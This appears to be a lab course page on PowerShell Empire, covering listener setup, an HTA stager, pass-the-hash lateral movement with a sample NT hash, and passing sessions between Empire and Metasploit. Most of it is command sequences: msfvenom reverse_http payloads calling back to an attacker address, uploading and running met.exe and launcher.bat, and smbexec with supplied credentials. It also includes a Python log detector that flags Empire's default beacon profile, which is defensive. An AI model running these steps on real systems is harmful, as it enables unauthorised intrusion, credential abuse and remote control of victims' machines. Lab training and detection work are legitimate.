# Module 23 (PowerShell Empire)

## PowerShell Empire

### Listener

```bash
// list the available Empire commands
?

// select the http listener module
uselistener http

// show its options; Name, Host, Port and DefaultProfile are the ones to check
info
```

<figure><img src="https://4250388013-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FcgRjLSWS0JF8FXrQAeJd%2Fuploads%2F64EjPtfpDvQFvcfVHvK0%2Fimage.png?alt=media&#x26;token=0677706a-04ef-4386-9156-90ce535009b2" alt=""><figcaption></figcaption></figure>

Starting the listener with the options shown by `info` (change `Name`, `Host` or `Port` with `set` first if the defaults do not fit):

```bash
execute
```
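One caveat on the listener: the `DefaultProfile` value printed by `info` (the request URIs and user-agent the agent beacons with) is the same on every Empire install unless you change it, so it is a fingerprint. The Python below is an added example, not part of this page or of Empire, that parses combined-format web-proxy log lines and flags clients whose requests match both the URIs and the user-agent of that profile. The profile string used is assumed to be Empire's shipped default (compare it against your own `info` output), and the log lines are constructed for the example.

```python
import re
from collections import defaultdict

# Empire http listener default profile, as printed in the DefaultProfile field
# of `info`: request URIs left of '|', user-agent right of it. Assumed here to be
# Empire's shipped default; compare with the value your own listener shows.
EMPIRE_DEFAULT_PROFILE = (
    "/admin/get.php,/news.php,/login/process.php|"
    "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
)

def parse_profile(profile):
    """Split an Empire profile string into (set of URIs, user-agent)."""
    uris, ua = profile.split("|", 1)
    return {u.strip() for u in uris.split(",")}, ua

DEFAULT_URIS, DEFAULT_UA = parse_profile(EMPIRE_DEFAULT_PROFILE)

# Apache/nginx "combined" log format; the constructed sample below uses it.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

def parse_line(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def indicators(req, uris=DEFAULT_URIS, ua=DEFAULT_UA):
    """Indicators a single request matches against the profile."""
    hits = []
    if req["path"].split("?", 1)[0] in uris:
        hits.append("profile-uri")
    if req["ua"] == ua:
        hits.append("profile-ua")
    return hits

def find_profile_matches(lines, min_requests=3):
    """Return {client: [(ts, method, path), ...]} for clients that sent at least
    min_requests requests matching BOTH the URI set and the user-agent. A lone
    hit on either is weak (the UA is a genuine IE11 string), so both are needed."""
    per_client = defaultdict(list)
    for line in lines:
        req = parse_line(line)
        if req and len(indicators(req)) == 2:
            per_client[req["client"]].append((req["ts"], req["method"], req["path"]))
    return {c: r for c, r in per_client.items() if len(r) >= min_requests}

# Constructed sample log: one beaconing host (10.11.0.22) and one ordinary browser.
SAMPLE_LOG = """\
10.11.0.22 - - [10/Mar/2020:10:00:01 +0000] "GET /admin/get.php HTTP/1.1" 200 1296 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
10.11.0.22 - - [10/Mar/2020:10:00:06 +0000] "POST /login/process.php HTTP/1.1" 200 32 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
10.11.0.22 - - [10/Mar/2020:10:00:11 +0000] "GET /news.php HTTP/1.1" 200 1296 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
10.11.0.5 - - [10/Mar/2020:10:00:12 +0000] "GET /news.php HTTP/1.1" 200 4871 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/73.0"
10.11.0.5 - - [10/Mar/2020:10:00:13 +0000] "GET /index.html HTTP/1.1" 200 4871 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
""".splitlines()

if __name__ == "__main__":
    for client, reqs in find_profile_matches(SAMPLE_LOG).items():
        print(client, len(reqs), "requests matching the default Empire profile")
```

From the operator's side the same check is the reason to `set DefaultProfile` to something that blends with the target's traffic before `execute`; from the defender's side, swap `EMPIRE_DEFAULT_PROFILE` for whatever profile you have observed and run the function over the proxy logs.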

### Stager

The stager is the small first-stage file dropped on the target; when it runs it downloads the full Empire agent, and that agent calls back to the `http` listener started above. Generating an HTA stager:

```bash
//specify what stager to use
usestager windows/hta

//associate the stager with the http listener created above (the value is the listener's Name)
set Listener http

//write the stager to a file
set OutFile stage.hta

//generate the stager
execute
```

<figure><img src="https://4250388013-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FcgRjLSWS0JF8FXrQAeJd%2Fuploads%2FxysXsOSXSzQd7OebAurK%2Fimage.png?alt=media&#x26;token=4f9d069e-3009-47ea-bff7-718fca498555" alt=""><figcaption></figcaption></figure>

### Lateral Movement

```bash
// general form: usemodule lateral_movement/<technique>
// pass-the-hash over SMB using the smbexec technique
usemodule lateral_movement/invoke_smbexec
```

```bash
// target host to move to
set ComputerName client251
// listener the new agent on client251 will call back to
set Listener http
// credentials: account, its NT hash (no plaintext password needed) and domain
set Username jeff_admin
set Hash e2b475c11da2a0748290d87aa966c327
set Domain corp.com
execute
```

### Switching Between Empire and Metasploit

Spawning a Meterpreter session from an Empire agent. First, in Metasploit, generate the payload and start a matching handler:

```
// on the attacking machine, generate the payload
msfvenom -p windows/meterpreter/reverse_http LHOST=10.11.0.4 LPORT=7777 -f exe -o met.exe

// in msfconsole, start a handler for it
use multi/handler
set payload windows/meterpreter/reverse_http
set LPORT 7777
set LHOST 10.11.0.4
run
```

Then, from the Empire agent, upload the executable (it lands in the agent's current directory, here the user's Downloads folder) and run it; the session appears in the Metasploit handler:

```
upload /home/h3ckt0r/met.exe
shell dir
shell C:\Users\offsec.corp\Downloads\met.exe
```

Spawning an Empire agent from a Meterpreter session. In Empire, generate a batch launcher tied to the `http` listener (saved by default to `/tmp/launcher.bat`):

```
usestager windows/launcher_bat
set Listener http
execute
```

In the Meterpreter session, upload the launcher and run it from a command shell; the new agent checks in to the `http` listener:

```
upload /tmp/launcher.bat
shell
dir
launcher.bat
```
